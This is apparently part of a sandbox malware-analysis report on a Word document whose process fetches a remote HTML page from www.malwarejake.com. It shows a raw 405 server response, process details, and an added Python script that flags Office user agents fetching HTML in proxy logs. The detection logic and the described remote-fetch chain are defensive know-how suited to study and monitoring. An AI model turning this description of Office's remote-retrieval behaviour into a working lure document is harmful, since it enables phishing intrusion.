2022-08-18 06:27:26 UTC | 11 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
Data Ascii:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PROPFIND is not allowed for this URL.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server a


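The sessions above record the order in which WINWORD.EXE reaches for the document's external HTML target: an OPTIONS probe carrying the "Microsoft Office Protocol Discovery" user agent, a HEAD on /456.html carrying "Microsoft Office Existence Discovery", an OPTIONS and a PROPFIND from the WebDAV Mini-Redirector (which this Apache host refuses with 405, so no WebDAV mount is established), and only then a GET of /456.html with the Internet Explorer style user agent that ends in "ms-office; MSOffice 14". The first two probes are emitted for ordinary hyperlinks and linked files as well, so on their own they are noise; the signal worth alerting on is Word itself retrieving an HTML resource that it existence-checked moments earlier. The script below is an added example and is not part of the Joe Sandbox report. It correlates proxy-style request log lines per client and host, and reports every HTML document fetched by an Office user agent together with which of the preceding probes were seen. The one-request-per-line log format is an assumption; the sample lines are constructed to mirror the report's sessions for 192.168.2.22 against www.malwarejake.com, and the two additional clients are invented to show the cases that must not alert.

```python
"""Flag Office-initiated fetches of remote HTML documents in request logs.

Added example; not part of the Joe Sandbox report. The log format is an
assumption: one request per line, single-space separated fields, user agent
quoted. The sample lines are constructed to mirror the sessions the report
shows for 192.168.2.22 -> www.malwarejake.com/456.html; the other two
clients are invented to exercise the non-alerting paths.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample log: <timestamp> <client> <method> <host> <path> "<user-agent>"
SAMPLE_LOG = """\
2022-08-18T06:27:05Z 192.168.2.22 OPTIONS www.malwarejake.com / "Microsoft Office Protocol Discovery"
2022-08-18T06:27:12Z 192.168.2.22 HEAD www.malwarejake.com /456.html "Microsoft Office Existence Discovery"
2022-08-18T06:27:17Z 192.168.2.22 OPTIONS www.malwarejake.com / "Microsoft-WebDAV-MiniRedir/6.1.7601"
2022-08-18T06:27:19Z 192.168.2.22 PROPFIND www.malwarejake.com / "Microsoft-WebDAV-MiniRedir/6.1.7601"
2022-08-18T06:27:21Z 192.168.2.22 GET www.malwarejake.com /456.html "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; ms-office; MSOffice 14)"
2022-08-18T06:27:30Z 192.168.2.23 OPTIONS intranet.example / "Microsoft Office Protocol Discovery"
2022-08-18T06:27:31Z 192.168.2.23 HEAD intranet.example /report.pdf "Microsoft Office Existence Discovery"
2022-08-18T06:27:40Z 192.168.2.24 GET www.malwarejake.com /456.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/100.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


@dataclass
class Request:
    timestamp: str
    client: str
    method: str
    host: str
    path: str
    user_agent: str


@dataclass
class OfficeActivity:
    """What one client has done against one host, in the order Word does it."""
    protocol_discovery: bool = False                     # OPTIONS with the Protocol Discovery UA
    existence_checks: set = field(default_factory=set)   # paths probed with HEAD
    webdav_probe: bool = False                           # OPTIONS/PROPFIND from the Mini-Redirector
    office_gets: dict = field(default_factory=dict)      # path -> timestamp of first GET by Office


def parse_line(line: str):
    """Return a Request for a well-formed line, None for anything else."""
    m = LINE_RE.match(line.strip())
    return Request(*m.groups()) if m else None


def correlate(log_text: str):
    """Group requests by (client, host) and record which Office stages appeared."""
    activity = defaultdict(OfficeActivity)
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        act = activity[(req.client, req.host)]
        ua = req.user_agent
        if req.method == "OPTIONS" and ua == "Microsoft Office Protocol Discovery":
            act.protocol_discovery = True
        elif req.method == "HEAD" and ua == "Microsoft Office Existence Discovery":
            act.existence_checks.add(req.path)
        elif ua.startswith("Microsoft-WebDAV-MiniRedir"):
            act.webdav_probe = True
        elif req.method == "GET" and "ms-office" in ua:
            act.office_gets.setdefault(req.path, req.timestamp)
    return activity


def find_office_html_fetches(log_text: str):
    """Report each HTML document an Office process fetched, with the probes that preceded it.

    Discovery probes alone are not reported, because Office sends them for any
    linked resource; only a GET of an .html/.htm target by an Office user agent is.
    """
    findings = []
    for (client, host), act in sorted(correlate(log_text).items(), key=lambda kv: kv[0]):
        for path, ts in sorted(act.office_gets.items()):
            if not path.lower().endswith((".html", ".htm")):
                continue
            findings.append({
                "timestamp": ts,
                "client": client,
                "host": host,
                "path": path,
                "existence_checked": path in act.existence_checks,
                "protocol_discovery": act.protocol_discovery,
                "webdav_fallback": act.webdav_probe,
            })
    return findings


if __name__ == "__main__":
    for finding in find_office_html_fetches(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the block reports a single finding, for 192.168.2.22 fetching /456.html from www.malwarejake.com with all three corroborating flags set; the intranet client that only probed a PDF and the browser that fetched the same page produce nothing. The existence_checked flag is the most useful of the three because it ties the HEAD and the GET to the same path; the WebDAV flag only records that Windows tried to mount the URL, which in the report the server refused.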
      No statistics
Target ID: 0
Start time: 08:26:20
Start date: 18/08/2022
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13f5c0000
File size: 1423704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

      No disassembly